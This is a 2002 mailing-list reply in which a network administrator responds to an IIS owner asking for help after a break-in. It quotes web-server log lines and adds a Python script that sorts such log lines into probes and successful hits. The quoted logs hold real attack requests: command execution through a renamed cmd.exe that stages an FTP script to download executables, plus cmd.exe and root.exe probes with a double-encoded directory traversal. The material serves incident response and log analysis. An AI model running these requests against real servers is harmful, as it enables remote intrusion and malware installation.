I have found similar entries in my apache access logs. Someone must be running a tool against our site not knowing if we actually run a Microsoft product.
We know better than that.

- Chris Payne

On Tue, 26 Feb 2002 15:51:44 -0500, GP wrote:

>Help, I recently found this on my IIS server after being contacted
>that my webserver attempted to scan someone's machine on port 80. I've
>looked on my web box and found the following files were installed
>msxc32.exe which seems to be Mirc program which is some type of chat
>program. I've talked to other techs here who have not installed this
>program. I've traced the following ip addresses back to the domain
>admins but before I contact I need to know if this is the intruder's ip
>address and what would be the best course of action. On the flip side
>what do I need to do to prevent this from happening in the future? I
>have since blocked these addresses but this is only a temp fix.
>
>18:56:21 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+shouldNT32.ocx+c:shouldNT32.ocx>>xl32.scr 502
>18:56:23 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+echo+get+shtlng32.dll+c:shtlng32.dll>>xl32.scr 502
>18:56:25 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+smba.dll+c:smba.dll>>xl32.scr 502
>18:56:27 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+echo+get+sndrec32.dl_+c:sndrec32.dl_>>xl32.scr 502
>18:56:33 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+thds32.exe+c:thds32.exe>>xl32.scr 502
>18:56:35 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+echo+get+winsd32.ocx+c:winsd32.ocx>>xl32.scr 502
>18:56:37 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+holes.txt+c:holes.txt>>xl32.scr 502
>18:56:39 156.63.205.47 GET /iisadmpwd/fuck.exe?/c+echo+bye>>xl32.scr 502
>18:56:54 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+ftp+-s:xl32.scr+-n+-d 502
>20:20:36 216.158.145.245 GET /scripts/root.exe?/c+dir 404
>20:20:36 216.158.145.245 GET /MSADC/root.exe?/c+dir 404
>20:20:36 216.158.145.245 GET /c/winnt/system32/cmd.exe?/c+dir 404
>20:20:36 216.158.145.245 GET /d/winnt/system32/cmd.exe?/c+dir 404
>20:20:36 216.158.145.245 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404
>20:20:36 216.158.145.245 GET
>
>
>

- -
Chris Payne
Network Administrator
Physical Resources Dept, University of Guelph
(519)824-4120 x2882
[EMAIL PROTECTED]
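
The following Python example is added here and is not part of either message. It separates request lines like those quoted above into probes that missed (404) and requests where the server reached the executable (any other status), grouped by source address. The status rule, the function names and the sample lines with documentation-range addresses are assumptions constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample lines in the same "time ip method uri status" layout
# as the quoted log; addresses are documentation ranges, not real hosts.
SAMPLE_LOG = """\
18:56:21 192.0.2.48 GET /iisadmpwd/x.exe?/c+echo+get+a.dll+c:a.dll>>xl32.scr 502
18:56:54 192.0.2.2 GET /iisadmpwd/x.exe?/c+ftp+-s:xl32.scr+-n+-d 502
20:20:36 198.51.100.245 GET /scripts/root.exe?/c+dir 404
20:20:36 198.51.100.245 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404
20:21:02 203.0.113.9 GET /index.html 200
"""

LINE = re.compile(r"^(\d\d:\d\d:\d\d) (\S+) (\S+) (\S+) (\d{3})$")
# An executable invoked with a "/c" command string in the query.
SHELL_QUERY = re.compile(r"\.exe\?/c\+", re.IGNORECASE)


def classify(uri, status):
    """Return None for ordinary traffic, else 'probe' or 'reached'."""
    if not SHELL_QUERY.search(uri):
        return None
    # Assumption: 404 means the target file was absent, so the request was
    # only a probe; any other status means the server located the file.
    return "probe" if status == 404 else "reached"


def triage(log_text):
    """Group suspicious request URIs by verdict and source address."""
    result = {"probe": defaultdict(list), "reached": defaultdict(list)}
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # wrapped or truncated line; skip rather than guess
        _time, ip, _method, uri, status = m.groups()
        verdict = classify(uri, int(status))
        if verdict:
            result[verdict][ip].append(uri)
    return result


if __name__ == "__main__":
    for verdict, by_ip in triage(SAMPLE_LOG).items():
        for ip, uris in by_ip.items():
            print(verdict, ip, len(uris))
```

Addresses under "reached" point at requests worth correlating with files found on disk; addresses under "probe" match the kind of scanning that also shows up in logs of servers that do not run IIS.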
